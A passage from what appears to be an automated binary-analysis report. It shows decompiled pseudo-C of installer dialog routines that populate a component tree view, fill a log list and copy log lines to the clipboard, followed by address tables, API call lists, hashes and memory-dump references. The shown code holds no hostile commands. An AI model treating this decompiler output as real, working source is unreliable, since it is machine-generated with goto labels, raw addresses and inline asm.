										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404598(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x42eb78; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x429fb4;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x429fcc;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x429fb4 = _t315;
									 *0x429fcc = _t315;
									 *0x42ebc0 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x42eb79 & 0x00000001;
										if(( *0x42eb79 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x42eb8c - _t315; // 0x1
										_v32 =  *0x429fcc;
										_t196 =  *0x42eb88; // 0x29056c
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42e33c; // 0x294de4
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E004044B6(0x3ff, 0xfffffffb, E0040456B(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x290574
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x290584
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x42eb8c; // 0x1
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x429fcc);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x42ebc0 = _a4;
					_t247 =  *0x42eb8c; // 0x1
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x429fcc = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x42eb60, 0x6e);
					 *0x429fc0 =  *0x429fc0 | 0xffffffff;
					_v24 = _t250;
					 *0x429fc8 = SetWindowLongA(_v8, 0xfffffffc, E00404C19);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x429fb4 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x429fb4);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E0040594D(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403CDD(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403CDD(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x42eb8c - _t318; // 0x1
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x429fcc + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x429fcc + _t318 * 4) = _t274;
									_t288 =  *( *0x429fcc + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x42eb8c; // 0x1
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403D12(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403D12(_v12);
								L89:
								return E00403D44(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                                          0x00404636
                                          0x0040463c
                                          0x0040463e
                                          0x00404644
                                          0x0040464a
                                          0x0040464d
                                          0x00404657
                                          0x00404660
                                          0x00404663
                                          0x00404666
                                          0x0040488e
                                          0x0040488e
                                          0x00404895
                                          0x004048a9
                                          0x00404897
                                          0x00404899
                                          0x0040489c
                                          0x0040489d
                                          0x004048a4
                                          0x004048a4
                                          0x004048ac
                                          0x004048b5
                                          0x004048c0
                                          0x004048c0
                                          0x004048c3
                                          0x004048c6
                                          0x004048d5
                                          0x004048d5
                                          0x004048dc
                                          0x00404954
                                          0x00404954
                                          0x00404957
                                          0x00404959
                                          0x0040495c
                                          0x00404963
                                          0x00404971
                                          0x00404971
                                          0x00404973
                                          0x00404976
                                          0x0040497d
                                          0x0040497f
                                          0x00404983
                                          0x004049a0
                                          0x004049a4
                                          0x004049a4
                                          0x00404985
                                          0x00404992
                                          0x00404992
                                          0x00404983
                                          0x0040497d
                                          0x00000000
                                          0x00404957
                                          0x004048de
                                          0x004048e1
                                          0x004048ec
                                          0x004048ee
                                          0x004048f1
                                          0x004048f8
                                          0x004048fd
                                          0x004048ff
                                          0x00404909
                                          0x00404909
                                          0x0040490d
                                          0x0040490f
                                          0x00404912
                                          0x00404914
                                          0x00404917
                                          0x0040492d
                                          0x0040492d
                                          0x00404919
                                          0x00404919
                                          0x0040491f
                                          0x00404921
                                          0x00404928
                                          0x00404923
                                          0x00404923
                                          0x00404923
                                          0x00404921
                                          0x00404931
                                          0x00404933
                                          0x00404938
                                          0x00404941
                                          0x00404942
                                          0x0040494c
                                          0x0040494c
                                          0x0040494e
                                          0x00404951
                                          0x00404951
                                          0x00404912
                                          0x00000000
                                          0x004048ff
                                          0x004048e3
                                          0x004048e6
                                          0x004048ea
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004048ea
                                          0x004048c8
                                          0x004048cf
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004048b7
                                          0x004048b7
                                          0x004048ba
                                          0x004049a7
                                          0x004049a7
                                          0x004049ae
                                          0x00404a22
                                          0x00404a22
                                          0x00404a29
                                          0x00404a35
                                          0x00404a35
                                          0x00404a37
                                          0x00404a3e
                                          0x00404a40
                                          0x00404a45
                                          0x00404a47
                                          0x00404a4a
                                          0x00404a4a
                                          0x00404a50
                                          0x00404a55
                                          0x00404a57
                                          0x00404a5a
                                          0x00404a5a
                                          0x00404a60
                                          0x00404a66
                                          0x00404a6c
                                          0x00404a6c
                                          0x00404a72
                                          0x00404a79
                                          0x00404bc6
                                          0x00404bc6
                                          0x00404bcd
                                          0x00404bcf
                                          0x00404bd6
                                          0x00404bda
                                          0x00404be7
                                          0x00404be7
                                          0x00404bea
                                          0x00404bf0
                                          0x00404c02
                                          0x00404c02
                                          0x00404bd6
                                          0x00000000
                                          0x00404a7f
                                          0x00404a81
                                          0x00404a86
                                          0x00404a89
                                          0x00404a8d
                                          0x00404a8d
                                          0x00404a92
                                          0x00404a95
                                          0x00404ad6
                                          0x00404ad8
                                          0x00404ae2
                                          0x00404ae8
                                          0x00404aeb
                                          0x00404af0
                                          0x00404af7
                                          0x00404afa
                                          0x00404b9c
                                          0x00404ba2
                                          0x00404ba8
                                          0x00404bad
                                          0x00404bb0
                                          0x00404bc1
                                          0x00404bc1
                                          0x00000000
                                          0x00404b00
                                          0x00404b00
                                          0x00404b00
                                          0x00404b03
                                          0x00404b09
                                          0x00404b0c
                                          0x00404b0e
                                          0x00404b10
                                          0x00404b12
                                          0x00404b15
                                          0x00404b18
                                          0x00404b1f
                                          0x00404b21
                                          0x00404b24
                                          0x00404b2b
                                          0x00404b2e
                                          0x00404b2e
                                          0x00404b2e
                                          0x00404b2e
                                          0x00404b32
                                          0x00404b35
                                          0x00404b41
                                          0x00404b42
                                          0x00404b45
                                          0x00404b47
                                          0x00404b47
                                          0x00404b47
                                          0x00404b37
                                          0x00404b39
                                          0x00404b39
                                          0x00404b66
                                          0x00404b66
                                          0x00404b67
                                          0x00404b73
                                          0x00404b82
                                          0x00404b82
                                          0x00404b84
                                          0x00404b87
                                          0x00404b90
                                          0x00404b90
                                          0x00000000
                                          0x00404b03
                                          0x00404a97
                                          0x00404aa2
                                          0x00404aa5
                                          0x00404aaa
                                          0x00404aac
                                          0x00404aae
                                          0x00404ab0
                                          0x00404ac0
                                          0x00404aca
                                          0x00404acc
                                          0x00404acf
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00404ab2
                                          0x00404ab2
                                          0x00404ab2
                                          0x00404ab5
                                          0x00404ab8
                                          0x00404aba
                                          0x00404aba
                                          0x00404aba
                                          0x00404abb
                                          0x00404abc
                                          0x00404abc
                                          0x00000000
                                          0x00404ab2
                                          0x00404a95
                                          0x00404a79
                                          0x004049b0
                                          0x004049b6
                                          0x00000000
                                          0x00000000
                                          0x004049c2
                                          0x004049c6
                                          0x00000000
                                          0x00000000
                                          0x004049d6
                                          0x004049d8
                                          0x004049db
                                          0x00000000
                                          0x00000000
                                          0x004049ed
                                          0x004049ef
                                          0x004049f2
                                          0x004049fc
                                          0x004049fe
                                          0x004049ff
                                          0x00404a00
                                          0x00404a0f
                                          0x00404a11
                                          0x00404a18
                                          0x00404a1b
                                          0x00000000
                                          0x00404a1b
                                          0x004049f4
                                          0x004049f7
                                          0x004049fa
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004049fa
                                          0x00000000
                                          0x004048ba
                                          0x0040466c
                                          0x00404671
                                          0x00404676
                                          0x0040467b
                                          0x0040467c
                                          0x00404685
                                          0x00404690
                                          0x0040469b
                                          0x004046a1
                                          0x004046af
                                          0x004046c4
                                          0x004046c9
                                          0x004046d4
                                          0x004046dd
                                          0x004046f2
                                          0x00404703
                                          0x00404710
                                          0x00404710
                                          0x00404715
                                          0x0040471b
                                          0x0040471d
                                          0x00404720
                                          0x00404725
                                          0x0040472a
                                          0x0040472c
                                          0x0040472c
                                          0x0040474c
                                          0x0040474c
                                          0x0040474e
                                          0x0040474f
                                          0x00404754
                                          0x00404757
                                          0x0040475a
                                          0x0040475e
                                          0x00404763
                                          0x00404768
                                          0x0040476c
                                          0x00404771
                                          0x00404776
                                          0x00404778
                                          0x0040477a
                                          0x00404780
                                          0x0040484a
                                          0x0040485d
                                          0x00000000
                                          0x00404786
                                          0x00404789
                                          0x0040478c
                                          0x0040478f
                                          0x0040478f
                                          0x00404795
                                          0x0040479b
                                          0x0040479e
                                          0x004047a4
                                          0x004047a5
                                          0x004047aa
                                          0x004047b3
                                          0x004047ba
                                          0x004047bd
                                          0x004047c0
                                          0x004047c3
                                          0x004047fd
                                          0x004047ff
                                          0x00404828
                                          0x00404801
                                          0x0040480e
                                          0x0040480e
                                          0x004047c5
                                          0x004047c8
                                          0x004047d7
                                          0x004047e1
                                          0x004047e9
                                          0x004047f0
                                          0x004047f8
                                          0x004047f8
                                          0x004047c3
                                          0x0040482e
                                          0x0040482f
                                          0x00404835
                                          0x0040483b
                                          0x0040483b
                                          0x00404848
                                          0x00404863
                                          0x00404867
                                          0x00404884
                                          0x00404889
                                          0x0040488c
                                          0x0040488c
                                          0x00000000
                                          0x00404869
                                          0x0040486e
                                          0x00404877
                                          0x00404c04
                                          0x00404c16
                                          0x00404c16
                                          0x00404867
                                          0x00000000
                                          0x00404848
                                          0x00404780

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460088990.000000000042C000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460093580.0000000000434000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460103986.0000000000437000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460107612.0000000000439000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $M$N$M)
                                          • API String ID: 1638840714-1412667084
                                          • Opcode ID: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                                          • Instruction ID: c130209c976f96ebc92895edf0e38420b46f59adec9cf70198d20430cf8fc3c6
                                          • Opcode Fuzzy Hash: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                                          • Instruction Fuzzy Hash: 1E02AEB0A00209AFDB20DF95DD45AAE7BB5FB84314F10817AF611BA2E1C7789D42CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404E07, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E00404E07(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x42e344; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404D9B, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E0040594D(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x429fd8;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42e32c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42eb68, 8);
							__eflags =  *0x42ebec - _t149; // 0x0
							if(__eflags == 0) {
								E00404CC9( *((intOrPtr*)( *0x4297a8 + 0x34)), _t149);
							}
							E00403CB6(1);
							goto L25;
						}
						 *0x4293a0 = 2;
						E00403CB6(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403D44(_a8, _a12, _a16);
						}
						ShowWindow( *0x42e330, _t149);
						ShowWindow(_t154, 8);
						E00403D12(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42eb70; // 0x2903c0
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e330 = GetDlgItem(_a4, 0x403);
				 *0x42e328 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e344 = _t127;
				_v8 = _t127;
				E00403D12( *0x42e330);
				 *0x42e334 = E0040456B(4);
				 *0x42e34c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403CDD(_a4);
				if(( *0x42eb78 & 0x00000003) != 0) {
					ShowWindow( *0x42e330, _t149);
					if(( *0x42eb78 & 0x00000002) != 0) {
						 *0x42e330 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403D12( *0x42e328);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x42eb78 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                                          0x00404e10
                                          0x00404e16
                                          0x00404e1f
                                          0x00404e22
                                          0x00404fb3
                                          0x00404fba
                                          0x00404fde
                                          0x00404fde
                                          0x00404fe4
                                          0x00404ff1
                                          0x0040500f
                                          0x0040500f
                                          0x00405016
                                          0x0040506d
                                          0x0040506d
                                          0x00405071
                                          0x00000000
                                          0x00000000
                                          0x00405073
                                          0x00405076
                                          0x00000000
                                          0x00000000
                                          0x00405080
                                          0x00405086
                                          0x00405088
                                          0x0040508b
                                          0x00405184
                                          0x00000000
                                          0x00405184
                                          0x0040509a
                                          0x004050a6
                                          0x004050ac
                                          0x004050af
                                          0x004050b2
                                          0x004050c7
                                          0x004050ca
                                          0x004050ca
                                          0x004050cd
                                          0x004050b4
                                          0x004050b9
                                          0x004050bf
                                          0x004050c2
                                          0x004050c2
                                          0x004050dd
                                          0x004050e5
                                          0x004050e6
                                          0x004050e8
                                          0x004050f1
                                          0x004050f4
                                          0x004050fb
                                          0x00405102
                                          0x0040510a
                                          0x0040510a
                                          0x00405118
                                          0x0040511e
                                          0x00405121
                                          0x00405121
                                          0x00405128
                                          0x0040512e
                                          0x00405137
                                          0x0040513e
                                          0x00405147
                                          0x00405149
                                          0x0040514c
                                          0x0040515b
                                          0x0040515d
                                          0x00405163
                                          0x00405164
                                          0x00405165
                                          0x00405165
                                          0x0040516d
                                          0x00405178
                                          0x0040517e
                                          0x0040517e
                                          0x00000000
                                          0x004050e8
                                          0x00405018
                                          0x0040501e
                                          0x0040504e
                                          0x00405050
                                          0x00405056
                                          0x00405061
                                          0x00405061
                                          0x00405068
                                          0x00000000
                                          0x00405068
                                          0x00405022
                                          0x0040502c
                                          0x00000000
                                          0x00404ff3
                                          0x00404ff3
                                          0x00404ff9
                                          0x00405031
                                          0x00000000
                                          0x0040503a
                                          0x00405002
                                          0x00405007
                                          0x0040500a
                                          0x00000000
                                          0x0040500a
                                          0x00404ff1
                                          0x00404e28
                                          0x00404e2c
                                          0x00404e35
                                          0x00404e3c
                                          0x00404e3f
                                          0x00404e42
                                          0x00404e45
                                          0x00404e46
                                          0x00404e47
                                          0x00404e60
                                          0x00404e63
                                          0x00404e6d
                                          0x00404e7c
                                          0x00404e84
                                          0x00404e8c
                                          0x00404e91
                                          0x00404e94
                                          0x00404ea0
                                          0x00404ea9
                                          0x00404eb2
                                          0x00404ed5
                                          0x00404edb
                                          0x00404eec
                                          0x00404ef1
                                          0x00404eff
                                          0x00404f0d
                                          0x00404f0d
                                          0x00404f12
                                          0x00404f20
                                          0x00404f20
                                          0x00404f25
                                          0x00404f28
                                          0x00404f2d
                                          0x00404f39
                                          0x00404f42
                                          0x00404f4f
                                          0x00404f5e
                                          0x00404f51
                                          0x00404f56
                                          0x00404f56
                                          0x00404f6a
                                          0x00404f6a
                                          0x00404f7e
                                          0x00404f87
                                          0x00404f90
                                          0x00404fa0
                                          0x00404fac
                                          0x00404fac
                                          0x00000000

                                          APIs
                                          • GetDlgItem.USER32(?,00000403), ref: 00404E66
                                          • GetDlgItem.USER32(?,000003EE), ref: 00404E75
                                          • GetClientRect.USER32 ref: 00404EB2
                                          • GetSystemMetrics.USER32 ref: 00404EBA
                                          • SendMessageA.USER32 ref: 00404EDB
                                          • SendMessageA.USER32 ref: 00404EEC
                                          • SendMessageA.USER32 ref: 00404EFF
                                          • SendMessageA.USER32 ref: 00404F0D
                                          • SendMessageA.USER32 ref: 00404F20
                                          • ShowWindow.USER32(00000000,?), ref: 00404F42
                                          • ShowWindow.USER32(?,00000008), ref: 00404F56
                                          • GetDlgItem.USER32(?,000003EC), ref: 00404F77
                                          • SendMessageA.USER32 ref: 00404F87
                                          • SendMessageA.USER32 ref: 00404FA0
                                          • SendMessageA.USER32 ref: 00404FAC
                                          • GetDlgItem.USER32(?,000003F8), ref: 00404E84
                                            • Part of subcall function 00403D12: SendMessageA.USER32 ref: 00403D20
                                          • GetDlgItem.USER32(?,000003EC), ref: 00404FC9
                                          • CreateThread.KERNEL32(00000000,00000000,Function_00004D9B,00000000), ref: 00404FD7
                                          • CloseHandle.KERNEL32(00000000), ref: 00404FDE
                                          • ShowWindow.USER32(00000000), ref: 00405002
                                          • ShowWindow.USER32(00000000,00000008), ref: 00405007
                                          • ShowWindow.USER32(00000008), ref: 0040504E
                                          • SendMessageA.USER32 ref: 00405080
                                          • CreatePopupMenu.USER32 ref: 00405091
                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004050A6
                                          • GetWindowRect.USER32 ref: 004050B9
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004050DD
                                          • SendMessageA.USER32 ref: 00405118
                                          • OpenClipboard.USER32(00000000), ref: 00405128
                                          • EmptyClipboard.USER32 ref: 0040512E
                                          • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405137
                                          • GlobalLock.KERNEL32 ref: 00405141
                                          • SendMessageA.USER32 ref: 00405155
                                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040516D
                                          • SetClipboardData.USER32 ref: 00405178
                                          • CloseClipboard.USER32 ref: 0040517E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.460051445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.460048242.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.460056453.0000000000407000.00000002.00020000.sdmp Download File
